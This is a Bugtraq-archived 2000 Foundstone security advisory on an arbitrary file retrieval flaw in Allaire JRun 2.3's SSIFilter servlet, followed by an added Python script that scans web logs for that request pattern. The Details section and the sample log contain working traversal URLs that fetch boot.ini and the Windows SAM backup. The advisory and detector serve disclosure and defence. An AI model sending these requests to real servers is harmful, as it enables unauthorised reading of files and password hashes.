Bugtraq mailing list archives
Allaire JRUN 2.3 Arbitrary File Retrieval
From: Foundstone Labs <labs () FOUNDSTONE COM>
Date: Mon, 23 Oct 2000 11:28:28 -0700
Foundstone, Inc.
http://www.foundstone.com
"Securing the Dot Com World"

Security Advisory

Allaire JRUN 2.3

----------------------------------------------------------------------
FS Advisory ID:         FS-102300-13-JRUN

Release Date:           October 23, 2000

Product:                Allaire JRUN 2.3

Vendor:                 Allaire Inc. (http://www.allaire.com)

Vendor Advisory:        http://www.allaire.com/security/

Type:                   Arbitrary File Retrieval

Severity:               High

Author:                 Shreeraj Shah (shreeraj.shah () foundstone com)
                        Saumil Shah (saumil.shah () foundstone com)
                        Stuart McClure (stuart.mcclure () foundstone com)
                        Foundstone, Inc. (http://www.foundstone.com)

Operating Systems:      All operating systems supported by JRUN

Vulnerable versions:    JRUN Server v2.3

Foundstone Advisory:    http://www.foundstone.com/cgi-bin/display.cgi?Section_ID=13
----------------------------------------------------------------------

Description

        Multiple show code vulnerabilities exist in Allaire's JRUN
        Server 2.3 allowing an attacker to view the source code of any
        file within the web document root of the web server.

        Using the same vulnerability, it is also possible to retrieve
        arbitrary files that lie outside the web document root on the
        host operating system's file system.

Details

        JRun 2.3 uses Java Servlets to handle parsing of various types
        of pages (for example, HTML, JSP, etc). Based on the settings
        in the rules.properties and servlets.properties files, it is
        possible to invoke any servlet using the URL prefix
        "/servlet/".

        It is possible to use JRun's SSIFilter servlet to retrieve
        arbitrary files on the target system. The following two
        examples show the URLs that can be used to retrieve any
        arbitrary files:

        http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
        http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../boot.ini
        http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../winnt/repair/sam._

        http://jrun:8000/servlet/ssifilter/../../test.jsp
        http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini
        http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._

        Note: It is assumed that JRun runs on host "jrun", port 8000.

Solution

        Follow the recommendations given in Allaire Security Bulletin
        ASB00-28, available at: http://www.allaire.com/security/

Credits

        We would also like to thank Allaire for their prompt reaction
        to this problem and their co-operation in heightening security
        awareness in the security community.

Disclaimer

        The information contained in this advisory is the copyright
        (C) 2000 of Foundstone, Inc. and believed to be accurate at
        the time of printing, but no representation or warranty is
        given, express or implied, as to its accuracy or completeness.
        Neither the author nor the publisher accepts any liability
        whatsoever for any direct, indirect or consequential loss or
        damage arising in any way from any use of, or reliance placed
        on, this information for any purpose. This advisory may be
        redistributed provided that no fee is assigned and that the
        advisory is not modified in any way.
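
A log check for the request pattern in the Details section, added here as an example and not part of the Foundstone advisory: it flags requests that invoke SSIFilter through the "/servlet/" prefix and marks those whose path info contains ".." segments. The log lines are constructed, and matching the servlet name case-insensitively and reporting plain direct invocation for review are assumptions of this example.

```python
import re
from urllib.parse import unquote, urlsplit

# Servlet names as they appear in the advisory's URLs, lower-cased for
# matching (assumption: over-matching on case is acceptable for detection).
SSI_SERVLETS = {"com.livesoftware.jrun.plugins.ssi.ssifilter", "ssifilter"}
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed Common Log Format lines for illustration, not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Oct/2000:11:30:01 -0700] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.44 - - [23/Oct/2000:11:31:07 -0700] "GET /servlet/ssifilter/../../test.jsp HTTP/1.0" 200 512',
    '192.0.2.44 - - [23/Oct/2000:11:31:09 -0700] "GET /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../boot.ini HTTP/1.0" 200 211',
    '192.0.2.10 - - [23/Oct/2000:11:32:40 -0700] "GET /servlet/ExampleServlet HTTP/1.0" 200 900',
    '192.0.2.77 - - [23/Oct/2000:11:33:02 -0700] "GET /servlet/ssifilter/page.shtml HTTP/1.0" 200 300',
]

def decode_path(target, rounds=3):
    """Return the request path, percent-decoded until stable, so encoded
    forms of the same path are normalised before matching."""
    path = urlsplit(target).path
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def classify(target):
    """Return 'traversal', 'direct-invoke' or None for one request target."""
    segments = [s for s in decode_path(target).split("/") if s]
    if len(segments) < 2 or segments[0].lower() != "servlet":
        return None
    if segments[1].lower() not in SSI_SERVLETS:
        return None
    # Everything after the servlet name is path info handed to SSIFilter.
    return "traversal" if ".." in segments[2:] else "direct-invoke"

def scan(lines):
    """Return (line_number, verdict, request_target) for each flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        verdict = classify(match.group(1)) if match else None
        if verdict:
            hits.append((number, verdict, match.group(1)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```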